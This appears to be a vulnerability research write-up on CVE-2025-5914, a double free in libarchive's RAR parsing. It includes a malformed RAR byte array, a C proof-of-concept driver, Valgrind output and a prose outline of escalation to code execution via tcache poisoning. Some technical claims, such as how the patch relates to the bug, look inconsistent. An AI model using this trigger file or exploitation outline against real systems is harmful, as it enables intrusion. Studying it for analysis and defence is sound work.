Articles & Research Notes

CVE-2025-5914: From Integer Overflow to Ownership Confusion in libarchive RAR Parsing

In this write-up, we present a deep-dive analysis of CVE-2025-5914, a critical vulnerability in libarchive originating from an integer overflow during RAR archive parsing. We will explore how a malformed header can induce a corrupted internal state, leading to a Double Free primitive. Beyond the initial crash, we will examine the library's memory management invariants and discuss the feasibility of transitioning this flaw into a more potent exploitation primitive.

Executive Summary:

CVE-2025-5914 represents a critical Integer Overflow within the RAR parsing module of libarchive, specifically during the calculation of seek offsets for compressed data blocks. The vulnerability is triggered when the parser processes a malformed FILE_HEAD with an oversized Pack Size field.

The root cause lies in an unchecked arithmetic addition used to determine the next header's position. This overflow results in an anomalous offset, which the internal RAR handler interprets as a non-recoverable memory or file-system error. In response, the RAR parser's error-handling path prematurely deallocates its internal state structures to prevent further corruption.

However, the library's global state machine does not immediately synchronize this deallocation. Consequently, when the calling application invokes the standard API cleanup function, archive_read_finish(), the library attempts to free the same internal structures a second time. This Ownership Confusion—where both the format-specific parser and the core API claim responsibility for the same memory lifecycle—manifests as a Double Free primitive, potentially allowing for heap grooming and arbitrary code execution.

Introduction

libarchive is a high-performance, multi-format archive handling library that serves as a core component in numerous operating systems, package managers (such as pacman and bsdtar), and file explorers. Its ubiquity makes it a highly attractive target for security research, as a vulnerability within its parsing logic can often be reached remotely through automated file processing services or browser-initiated downloads.

Historically, archive parsers have been a fertile ground for memory corruption bugs due to the inherent complexity of legacy formats and the necessity of manual memory management in C. RAR, in particular, is a complex format that requires the library to maintain a sophisticated internal state machine to track headers, compression dictionaries, and seek offsets.

In this analysis, we examine a specific failure in the RAR parsing implementation of version 2.8.3. We will demonstrate how an Integer Overflow in the offset calculation logic violates the library's internal memory safety invariants. This failure does not merely cause a controlled exit; instead, it creates an Ownership Mismatch between the format-specific parser and the core orchestration layer, leading to a Double Free condition. By dissecting this vulnerability, we aim to showcase the risks associated with "Error-path Cleanup" inconsistencies in complex C-based libraries.

Basic Concepts

1 - Arithmetic Overflow (Integer Wrapping)

At the architectural level, integer variables possess a finite width (e.g., 32-bit or 64-bit). An Arithmetic Overflow occurs when the result of a mathematical operation exceeds the maximum value representable within that bit-width. In the context of C-based libraries like libarchive, this typically involves size_t or off_t types used for memory allocation or file seeking. In two's complement arithmetic—the standard for signed integers—an overflow can cause a "wrap-around" effect. For instance, adding a positive value to a large positive integer can result in a negative value (the Sign Bit becomes set). In our case, the parser performs a pointer/offset addition:

New Offset = Current Position + Block Size

If Block Size is maliciously crafted to be a near-maximum value (e.g., 0xFFFFFFFF), the resulting New Offset wraps around to a very small integer.From a security perspective, this "wrap-around" is not a crash in itself, but a Logic Corruption primitive. The library's boundary checks, which expect New Offset to always be greater than Current Position, are bypassed or misinterpreted. In libarchive, this specific calculation error signals a "Corrupted Archive" state to the internal RAR parser, forcing it into an emergency cleanup path—the first stage of our Double Free chain.

2 - RAR File Format Architecture (Header Chaining & Seek Logic)

The RAR format is a block-oriented file structure where data is organized into a series of discrete headers, each describing a specific component of the archive (e.g., MAIN_HEAD, FILE_HEAD, MARK_HEAD). These headers are designed to be processed sequentially, forming a Linked-Chain Architecture.Each header contains a critical field known as the Head Size (and for file blocks, the Pack Size). The parser uses these values to calculate the offset of the subsequent header in the stream. This mechanism is fundamental to the library's "Skip" or "Seek" logic:

Next Header Offset = Current Offset + Header Size + Pack Size

From a security analysis perspective, the RAR parser implementation in libarchive relies on a Trust Assumption: it assumes that the arithmetic sum of these fields will always reside within the valid bounds of the allocated buffer. In a malicious scenario, an attacker can manipulate the Pack Size field in a FILE_HEAD block. If the parser fails to perform Strict Bounds Checking before the addition, an Integer Overflow occurs. This does not just point to a wrong memory address; it violates the parser's internal state, leading it to conclude that the archive is malformed. The critical failure in version 2.8.3 is how the library synchronizes this "malformed state" with its memory deallocation logic, transitioning a simple parsing error into a state of Ownership Confusion.
Representation of the rar file used in the POC :

    const unsigned char RAR_SIG[] =
{
 /* --- MARK_HEAD (7 bytes) --- */
 0x52, 0x61, 0x72, 0x21, 0x1a, 0x07, 0x00,
 /* --- MAIN_HEAD (Archive configuration) --- */
 0xe6, 0xd5, // Correct Header CRC (Calculated for 2.8.3)
 0x73, // Block Type: MAIN_HEAD
 0x00, 0x00, // Flags
 0x0d, 0x00, // Head Size (13 bytes)
 /* --- FILE_HEAD (The Vulnerable Target Block) --- */
 0x30, 0x19, // Valid CRC: Ensures the parser accepts the block
 0x74, // Block Type: FILE_HEAD
 0x00, 0x90, // Flags: HD_ADD_SIZE_PRESENT | LHD_LARGE
 0x1f, 0x00, // Head Size
 /* The Trigger: Pack Size = 0x7FFFFFFF (INT_MAX)
 When added to the current offset, this causes the integer overflow
 leading to the anomalous state. */
 0xff, 0xff, 0xff, 0x7f,
 /* --- Remaining FILE_HEAD Metadata --- */
 0x00, 0x00, 0x00, 0x00, // Unpacked Size
 0x03, // OS: MS-DOS
 0x00, 0x00, 0x00, 0x00, // File CRC
 0x00, 0x00, 0x00, 0x00, // Date
 0x14, // Version
 0x30, // Method: Store
 0x01, 0x00, // Name Size: 1 byte ('A')
 0x00, 0x00, 0x00, 0x00, // Attributes
 0x41 // Filename: 'A'
};    

The rar format file has been allocated within the heap:

 uint8_t* buf = malloc(sizeof(RAR_SIG)); //allocation memory
 if (buf == NULL) //error allocation (retun value = null)
{
 fprintf(stderr, "[-] Error Allocation RAR SIG file !\n");
 sys_exit(); //sys_exit
}
 memcpy(buf, RAR_SIG, sizeof(RAR_SIG)); //copy buffer


                        

3 - C (Heap Management) & Object Lifecycle

Memory management in C-based system libraries like libarchive relies heavily on dynamic allocation within the Heap. When a new archive object is initialized via archive_read_new(), the library allocates a contiguous block of memory to hold the struct archive_read opaque structure. This structure acts as a "Container" for various sub-objects, including format-specific handlers (like the RAR parser) and filter pipelines.

The core security invariant in heap management is Determined Ownership: for every allocated block, there must be exactly one clear owner responsible for its deallocation. In complex libraries, this ownership is often passed between layers:

  • The Orchestration Layer (Core API): Manages the global lifecycle of the archive handle.
  • The Format Layer (RAR Parser): Manages internal buffers and state-specific structures.

A breakdown in this logic leads to two primary exploitation primitives:

  • Double Free: Occurs when the same heap address is passed to the free() allocator twice. This corrupts the heap's internal metadata (such as the next pointers in fastbins or tcache), potentially allowing an attacker to overwrite arbitrary memory locations.
  • Use-After-Free (UAF): Occurs when a layer continues to use a pointer to a heap block that has already been deallocated.

In the context of CVE-2025-5914, the vulnerability is not a simple double-call to free(), but a Synchronization Failure between these layers. The RAR layer deallocates its state due to the Integer Overflow (error-path), but the Core API—unaware of this state change—attempts a redundant cleanup, leading to the violation of heap integrity.

4 - Library State Machine (Synchronization & Error Propagation)

Complex C libraries often operate as a Finite State Machine (FSM). In libarchive, the state machine coordinates the transition between different phases: NEW -> HEADER -> DATA -> EOF.

Each phase has strict invariants regarding which internal objects are "alive" and which layer owns their memory.

Diagram

Diagram State machine

When a format-specific parser (like the RAR module) is active, it enters a sub-state where it manages its own internal heap-allocated structures (struct rar). The core library relies on Error Return Codes (ARCHIVE_OK, ARCHIVE_WARN, ARCHIVE_FATAL) to synchronize its global state with the parser's local state.

The vulnerability arises from a State Desynchronization during error propagation. When the Integer Overflow occurs during a seek operation, the RAR parser encounters an inconsistent state. To protect the heap, the parser follows a "fail-fast" logic:

  1. It identifies the arithmetic anomaly as a fatal corruption.
  2. It triggers an internal cleanup routine to deallocate the struct rar.
  3. It returns an error code to the orchestration layer.
Diagram Ownership Confusion

Diagram Ownership Confusion

The critical flaw in version 2.8.3 is that the Core Orchestration Layer does not transition its global state to "Deallocated" upon receiving this specific error. Instead, it maintains a Stale Pointer to the now-freed RAR structure. This mismatch creates a "Zombie State" where the library's global handle still believes it owns a resource that has already been returned to the system allocator. This internal confusion is the fundamental prerequisite for the subsequent Double Free during the final API shutdown.
Ownership confusion (example state machine):

/* Stage 1: The library accepts the malformed header as valid */
read_archive = archive_read_next_header(base_obj, &entryArchive);
if (read_archive == ARCHIVE_OK)
{
    /* The State Machine is now "Inconsistent".
    - Core API: State is ARCHIVE_OK.
    - Internal RAR Parser: Loaded with a 0x7FFFFFFF Pack Size.
    */
    printf("[+] Header Accepted! Triggering Integer Overflow in Seek...\n");
    /* Stage 2: Triggering the overflow via data skipping */
    archive_read_data_skip(base_obj);
}
                  

When archive_read_data_skip() is called, the library attempts to calculate the distance to the next header using the overflowed value. Within the deep nesting of the RAR module, this calculation fails, and the module self-terminates and frees its local context. However, because the call stack returns through multiple layers, the archive_read object "forgets" that its internal RAR component has already been deallocated.

5 - Callback & Fallback Mechanisms (The Abstraction Gap)

To maintain its format-agnostic nature, libarchive utilizes a Callback-driven Architecture. When an application opens an archive (e.g., via archive_read_open_memory), it registers a set of function pointers (Callbacks) that the library invokes whenever it needs more data.

The Callback Layer: The library's core does not "read" files; it asks the Callback Provider to fill a buffer. This creates a decoupled environment where the format parser (RAR) is several layers of abstraction away from the actual data source.

The Fallback Trap: In the context of CVE-2025-5914, the Fallback Mechanism refers to the library's "Error Recovery" path. When the RAR parser triggers an Integer Overflow during a seek operation, the standard data-flow is interrupted. The library then enters a "Fallback to Cleanup" mode:

  • The Parser's Local Exit: The RAR module, realizing it cannot recover from the anomalous offset, invokes its local destructor to free its context.

Technical Analysis

Affected Component:

The vulnerability is rooted in the RAR format parser and its interaction with the Core Read API of libarchive. The flaw manifests during the lifecycle management of archive objects, specifically when processing memory-backed streams.

Key Functional Entry Points:

  • archive_read_open_memory() (The Initialization Vector): This function initializes the heap-based context for reading archives directly from a memory buffer. It sets up the client_data structures and the callback pointers. In the context of this vulnerability, it is responsible for allocating the initial state that will later be subject to ownership confusion.
  • archive_read_data_skip() (The Trigger): This is the core "Trigger" function. When invoked, it calls the format-specific rar_read_data_skip handler. It is within this handler (and its nested calls to archive_read_format_rar_read_header) that the Integer Overflow occurs during the calculation of the next block offset. The failure here initiates the premature "first free" of the RAR state structure.
  • archive_read_finish() (The Sink): This function acts as the Vulnerability Sink. It is the standard API call used to deallocate the archive object and all its associated modules. Because the internal RAR state was already freed during the failure in archive_read_data_skip, this function attempts to deallocate the same memory address again, resulting in a Double Free condition.

Target Version & Scope:

  • Primary Target: The vulnerability has been meticulously confirmed and reproduced in libarchive version 2.8.3.
  • Broad Impact: Systematic analysis indicates that all versions of libarchive prior to 3.8.0 are potentially susceptible to this specific logic flaw in error-path cleanup, depending on the format parser's implementation.

Type of Vulnerability:

While CVE-2025-5914 is formally cataloged as an Integer Overflow (CWE-190)/ (CWE-415) , a rigorous architectural analysis reveals that the overflow is merely the initial trigger (the Source) and not the fundamental security failure. The true vulnerability lies in a Parser-Driven Lifetime Violation and Ownership Confusion .

The Hierarchy of Failure:

  1. The Trigger (Integer Overflow): The oversized Pack Size value in the RAR header causes an arithmetic wrap-around. However, in a memory-safe environment, this should only lead to an "Invalid Archive" error and a graceful exit.
  2. The Root Cause (Ownership Mismatch): The core issue is the library's inability to maintain a single "Source of Truth" regarding the ownership of the struct rar object on the Heap. There is a clear conflict between:
    • Parser Ownership: The internal RAR module, which deallocates the object upon detecting the overflow.
    • Core Ownership: The API orchestration layer, which remains unaware of this deallocation.
  3. The Outcome (Double Free): The fact that the library generates an abort/exit flow rather than an immediate Segmentation Fault upon the overflow proves that the execution continues until it hits the redundant free() call.

Proof of Concept Logic:

If the Integer Overflow were the primary issue, the impact would be limited to a logic error or an out-of-bounds read. However, because the system allows the same heap-allocated structure to be claimed (and freed) by two different layers of the library, we transition from a simple arithmetic error into a critical Memory Corruption Primitive.

As our analysis demonstrates, we are not just reading "random data"; we are exploiting a Synchronization Gap in memory management. The library's failure to nullify the stale pointer after the first free() in the error-path is the definitive proof of a Lifetime Violation.

Proof of Concept (PoC)

The goal of this PoC is to demonstrate the Double Free condition by forcing the library into an inconsistent state. The PoC targets the interaction between the memory-backed reader and the RAR format handler.

1. Payload Construction:

The exploit begins with a carefully crafted RAR byte stream. The critical part is the FILE_HEAD block, where we set the Pack Size to a value that will cause a wrap-around when added to the current stream offset.

// Malformed Pack Size: 0x7FFFFFFF
// Calculation: Current_Offset + 0x7FFFFFFF = Integer Overflow
0xff, 0xff, 0xff, 0x7f,

2. Execution Flow & Detection:

We use a driver program that utilizes the libarchive API. The execution follows this deterministic path:
Initialization: archive_read_open_memory() maps our malicious buffer.



archive_memory = archive_read_open_memory
(
    base_obj, //base object struct
    buf, //buffer allocation (malloc())
    sizeof(RAR_SIG) //size buffer
);

//check error alloc state machine
if (archive_memory == ARCHIVE_FATAL)
{
    fprintf ( stderr, "[-] archive_read_open_memory() : Error link buffer (ARCHIVE_FATAL) !\
    fprintf(stderr, "%s\n", archive_error_string(base_obj));
    sys_exit(); //call sys_exit
}
                   

Trigger: A call to archive_read_data_skip() forces the RAR parser to process the overflowed Pack Size.

if (read_archive == ARCHIVE_OK)
{
    printf("[+] Header Accepted! Triggering Integer Overflow in Seek...\n");
    archive_read_data_skip(base_obj); //Overflow Pack Size
}
                   

First Free: Internal logs and debuggers (like Valgrind) show a free() call originating from archive_read_format_rar_read_data_skip.

The Crash (Sink): Upon calling archive_read_finish(), the second free() is attempted on the same pointer, leading to an immediate abort by the glibc heap protector.


int core_free = archive_read_finish(base_obj); //ownership core : free base struct (double free)
if (core_free == ARCHIVE_OK)
{
    printf("[+] Core Ownership : Free Base struct (double free)."); //success poc
}
else
{
    printf("[-] Core Ownership : Error free base struct (Not double free) !\n");
}
                  

Run poc :

This POC was run on the Linux system remnux 6.10.14 (x86_64).

* Translation of the source file:


gcc poc.c -o INTEGER_OVERFLOW \
-I./libarchive \
-L./.libs \
-larchive \
-lz   

* Running an ELF file with Valgrind to check for memory errors:

LD_LIBRARY_PATH=./.libs valgrind --tool=memcheck ./INTEGER_OVERFLOW
                  

Trace Analysis: Valgrind will catch the Double Free at the call to archive_read_finish().

The Log: The output will indicate that the memory address was already freed by the RAR parser module during the data_skip operation.

Output:


==14550== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==14550== Command: ./INTEGER_OVERFLOW
==14550==
[+] Call main function...
[+] Start RAR PARSER...
[+] Archive Memory : ---------------
[+] Size buffer : 47 (hex=2F)
------------------------------------
[+] Triggering Final Free (This should be the Double Free)...
[+] Triggering Final Free...
==14550== Invalid read of size 8
==14550== at 0x486F524: archive_read_finish (archive_virtual.c:63)
==14550== by 0x109526: func_1 ( in /home/remnux/Desktop/n-day/libarchive_int_overflow/libarchi
==14550== by 0x109587: main ( in /home/remnux/Desktop/n-day/libarchive_int_overflow/libarchive
==14550== Address 0x6fab138 is 8 bytes inside a block of size 1,120 free'd
==14550== at 0x483CA3F: free ( in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-
==14550== by 0x4857F5C: _archive_read_finish (archive_read.c:806)
                   

Download full result POC (Valgrind) : result_poc.txt

The Logical Error (Root Cause)

The fundamental failure in CVE-2025-5914 is not merely an arithmetic overflow, but a State Synchronization Failure during an error-handling path. In robust C programming, an error should either be handled locally without side effects or propagated upwards to a layer that manages the object's lifetime. libarchive fails by doing both inconsistently.

1. The Broken Invariant:
The library operates on a design invariant where the Core Layer manages the top-level struct archive_read, while the Format Layer (RAR) manages its own internal struct rar. The logical error occurs when an unexpected event (the Integer Overflow) breaks the communication between these two layers.

2. The Premature Deallocation (The Ghost Object):
When the overflow is triggered, the RAR parser encounters a state it cannot recover from. It treats this as a Fatal Error and immediately invokes its internal destructor to free the struct rar.

The Error: The parser returns an error code, but it does not nullify the pointer held by the Core Layer.
The Result: The Core Layer now holds a Stale Pointer—a Ghost object that exists in the core's logic but has been erased from the Heap.

3. Redundant Ownership Assumption:
The Core Layer's cleanup logic in archive_read_finish() is designed to be "thorough." It iterates through all registered formats and, if it sees a non-null pointer for a format (like RAR), it assumes it still owns that memory and must free it to prevent a memory leak.

Because the RAR parser failed to communicate that it had already performed a "self-cleanup," the Core Layer proceeds with a redundant free() call. This is a classic Double Free resulting from Ownership Confusion: two different parts of the same program both believed they were the "last owner" responsible for the same memory block.

Patch Analysis

A critical part of vulnerability research is evaluating the effectiveness of the official fix. Upon reviewing the commit for CVE-2025-5914, we observed that the remediation focuses on Integer Promotion rather than Architectural Memory Safety.

1. The Surface-Level Fix

The patch modifies the struct rar in archive_read_support_format_rar.c by changing the data types of nodes and cursor:

* Before the Patch :


unsigned int cursor;
unsigned int nodes;
unsigned int i;

* After the Patch

size_t cursor;
size_t nodes;
size_t i;
                  

The developers' logic was that by using size_t (64-bit on modern systems), the 4-billion-node overflow threshold becomes practically unreachable. They treated the Integer Overflow as the primary vulnerability.

The Persistence of Ownership Confusion:
As our analysis demonstrated, the overflow was merely the trigger for an error-handling path. The true "Root Cause"—the Ownership Mismatch between the RAR parser and the Core API—remains unaddressed in this patch.

  • No Pointer Nullification: The patch does not ensure that the struct rar pointer is set to NULL immediately after the first free() in the error path.
  • State Blindness: The Core API still has no mechanism to verify if the format-specific data has already been deallocated by the sub-module before it attempts its own cleanup.

The "Bypass" Potential:
By focusing on the arithmetic overflow, the library remains vulnerable to any other error condition that might trigger the same premature cleanup logic. If an attacker finds a different way to induce a fatal error within the RAR parser (e.g., through corrupted Huffman tables or invalid dictionary sizes), the Double Free Primitive will still be reachable.

Conclusion of the Analysis:

The official fix is a Band-aid. It pushes the boundary of the overflow further away but leaves the Memory Corruption Logic intact. A robust fix would have required a synchronization of the library's state machine, ensuring that ownership is explicitly handed back or invalidated upon failure.

Switch n-day: Weaponizing the Ownership Conflict

The transition from a logical "Ownership Confusion" to a full Remote Code Execution (RCE) is achieved by manipulating the heap's metadata. In CVE-2025-5914, the double free isn't just a crash; it is a Primitive that allows us to redirect the allocator's internal logic.

1 - Heap Grooming / Spraying
To ensure the exploit is deterministic, we must control the heap layout. By "Spraying" the heap with objects of a similar size to struct rar, we fill the memory gaps. This ensures that when the RAR module performs its premature free(), the resulting hole is predictable and surrounded by our controlled data, preventing the allocator from merging it with other blocks (Consolidation).

2 - Overlapping Objects (The Core Exploit)
This is where the Ownership Conflict becomes fatal. Because the Core API is "blind" to the fact that the RAR module has already freed the memory, we have a Window of Opportunity.

During this window, we trigger a new allocation that "reclaims" the memory chunk formerly occupied by struct rar.

Now, we have two different pointers in the program referring to the same memory location: the Core API's stale pointer and our new object's pointer. This is an Overlapping Objects state, allowing us to leak or overwrite sensitive internal data.

3 - Fastbin Dup & Tcache Poisoning (Primitive Write-Only)
Once we have overlapping objects, we trigger the second free() via archive_read_finish(). This induces a Double Free in the tcache or fastbins:

The Poisoning: The allocator now sees a circular link in its free list. We can then overwrite the next pointer of the freed chunk with an Arbitrary Address (e.g., the address of the Global Offset Table or a function pointer ).
The Arbitrary Write: The subsequent malloc() call will return a pointer to our target address. Writing to this "Fake Chunk" allows us to redirect the execution flow to a ROP Chain or system().

Conclusion: The Architecture of Failure

The investigation into CVE-2025-5914 reveals a profound truth in software security: Memory safety is a product of logical consistency, not just arithmetic bounds. While the initial discovery focused on an Integer Overflow, our deep-dive analysis has proven that the overflow was merely a "canary in the coal mine." The true vulnerability resides in the Ownership Mismatch between the decoupled layers of libarchive. The failure to synchronize the state between the format-specific parser and the core orchestration API created a Double Free primitive that remains a potent threat to system integrity.

Final Verdict on the Remediation
The official patch, which relies on Integer Promotion (moving to size_t), is a symptomatic treatment. It effectively raises the bar for triggering the vulnerability via the "4-billion nodes" path, but it leaves the underlying State Machine desynchronization intact. As long as the library maintains stale pointers in its error-handling routines, the risk of a Switch n-day exploitation remains high.

In the final analysis, CVE-2025-5914 serves as a stark reminder that as our systems scale, the "small" logical gaps in memory management become the "large" gateways for modern exploitation. The battle for security is won or lost in the Architecture, not just the variables

Written by the Security Research Team – Bytrep, January 2026